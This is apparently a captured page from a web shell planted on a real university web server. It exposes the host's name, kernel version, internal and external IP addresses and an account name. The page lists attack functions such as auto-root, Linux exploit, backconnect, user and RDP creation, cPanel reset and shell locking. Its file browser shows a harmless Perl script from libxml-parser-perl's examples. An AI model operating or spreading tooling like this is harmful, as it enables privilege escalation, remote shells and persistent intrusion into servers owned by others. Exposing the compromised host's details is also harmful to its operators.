Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.116.63.107
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-parser-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
REC-xml-19980210.xml
155.62
KB
-rw-r--r--
canonical
2.77
KB
-rwxr-xr-x
canontst.xml
510
B
-rw-r--r--
ctest.dtd
71
B
-rw-r--r--
xmlcomments
684
B
-rwxr-xr-x
xmlfilter
6.25
KB
-rwxr-xr-x
xmlstats
3.36
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xmlcomments
#!/usr/bin/perl -w # # $Revision: 1.1.1.1 $ # # $Date: 2003-07-27 11:07:11 $ use XML::Parser; my $file = shift; die "Can't find file \"$file\"" unless -f $file; my $count = 0; my $parser = new XML::Parser( ErrorContext => 2, ParseParamEnt => 0 ); $parser->setHandlers( Comment => \&comments ); $parser->parsefile($file); print "Found $count comments.\n"; ################ ## End of main ################ sub comments { my ( $p, $data ) = @_; my $line = $p->current_line; $data =~ s/\n/\n\t/g; print "$line:\t<!--$data-->\n"; $count++; } # End comments # Tell Emacs that this is really a perl script # Local Variables: # mode:perl # End:
Close